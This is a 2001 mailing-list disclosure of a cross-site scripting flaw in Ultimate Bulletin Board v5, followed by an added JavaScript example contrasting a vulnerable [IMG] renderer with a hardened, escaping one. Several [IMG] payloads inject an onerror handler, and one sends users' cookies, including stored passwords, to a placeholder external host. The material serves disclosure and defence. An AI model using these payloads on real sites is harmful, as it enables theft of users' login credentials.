Ultimate Bulletin Board
Date: Wed, 21 Feb 2001 14:19:16 -0800
From: Scott Ashman <[email protected]>
To: [email protected]
Subject: Ultimate Bulletin Board

Here is a message I just popped off to infopop about their Ultimate Bulletin Board v5 product.  It's not really meant for someone not used to their product.


--------------------------------------------------------------------------------


If a user has info stored in a cookie, replies to a message and is using IE 4.0+, there is a way for a hacker to trap his IP / user name / password / other cookie information and send them to an external source using your UBB code with HTML *off*.  There is a way to do this by simply viewing a message as well, although it's obvious something is going on as it involves a redirection.  Here's how it works:

Apparently the [img][/img] tag allows non-spaced javascript to run.  You can write a line like this:

[IMG]test"onerror="alert('test');[/IMG]

This will run the javascript alert when the image 'test' fails to load.

Your cookies can hold both the username and password but are only accessible on the http://sitename/cgi-bin/ path.  Script running on anything in cgi-path (replies) can access it.  So

[IMG]test"onerror="alert(document.cookie);[/IMG]

will pop up an alert box with the cookie info on a "reply" page as it's displayed in the thread review at the bottom.

You can reassign the src of your image (this.src) with document.cookie tacked on to point to an external page.  The weird thing about imgs and http requests in general is that your destination does not have to be an image.  So <a src="www.excite.com/index.html"> will actually try to access index.html.  Hence, you can add actual passable information to an external cgi or whatever.  On the external page all you need to do is either watch the logs or have the page itself log any URL variables along with IPs coming in from the request.

The final line should read something like:

[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);[/IMG]

(Pasting this line [no spaces/crlf] in a message means that any user replying to anything in that thread will cause their cookie to be sent to an external source.)

Scott Ashman
Jaspin Interactive www.jaspin.com
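The flaw the post describes is attribute injection: the text between [IMG] and [/IMG] is dropped straight into src="...", so a double quote closes the attribute and whatever follows becomes a new attribute (onerror), with no space needed. The following is an added example in JavaScript and is not code from the post, from Infopop or from UBB: a minimal BBCode [IMG] renderer that reproduces that behaviour next to a hardened one that whitelists the URL and escapes the output. The function names, regexes and the sample posts are assumptions made for illustration.

```javascript
// Added example, not code from the post or from Infopop's UBB: a minimal
// BBCode [IMG] renderer that reproduces the flaw the post describes (the tag
// body is dropped straight into the src attribute, so a double quote closes
// the attribute and anything after it becomes a new attribute such as
// onerror), beside a hardened renderer. The regexes and function names are
// assumptions for illustration; UBB's real code is not reproduced here.

const IMG_TAG = /\[IMG\](.*?)\[\/IMG\]/gi;

// Vulnerable: no validation, no escaping. Markup inside the tag body reaches
// the browser verbatim, and browsers parse src="test"onerror="..." as two
// attributes even without a space between them.
function renderImgNaive(bbcode) {
  return bbcode.replace(IMG_TAG, '<img src="$1">');
}

// Escape the five characters that matter inside HTML text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Only absolute http(s) URLs built from a conservative character set are
// rendered; quotes, angle brackets, whitespace and the javascript: scheme
// cannot pass. Anything else is shown as escaped text instead of being
// turned into a tag.
const SAFE_IMG_URL = /^https?:\/\/[A-Za-z0-9._~\-\/?#@!$&*+,;=%:]+$/;

function renderImgHardened(bbcode) {
  return bbcode.replace(IMG_TAG, (whole, url) => {
    if (!SAFE_IMG_URL.test(url)) {
      return escapeHtml(whole);
    }
    // Escaping again is defence in depth: the whitelist already excludes
    // the characters that could break out of the attribute.
    return `<img src="${escapeHtml(url)}">`;
  });
}

// Constructed sample posts: the two payloads from the message above and a
// benign image URL.
const SAMPLES = [
  '[IMG]test"onerror="alert(document.cookie);[/IMG]',
  "[IMG]test\"onerror=\"this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);[/IMG]",
  '[IMG]http://example.com/logo.gif[/IMG]',
];

// Render every sample both ways and return the pairs so the difference can
// be inspected or asserted on.
function compareRenderers(samples = SAMPLES) {
  return samples.map((s) => ({
    input: s,
    naive: renderImgNaive(s),
    hardened: renderImgHardened(s),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of compareRenderers()) {
    console.log(`input:    ${r.input}\nnaive:    ${r.naive}\nhardened: ${r.hardened}\n`);
  }
}
```

Run with `node` to see the naive renderer emit `<img src="test"onerror="alert(document.cookie);">` for the first payload while the hardened one emits the tag as escaped text. Note that the cookie path restriction to /cgi-bin/ the post mentions is no defence here: the injected script runs on the reply page, which lives under that path, so output escaping at render time is the fix that matters.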



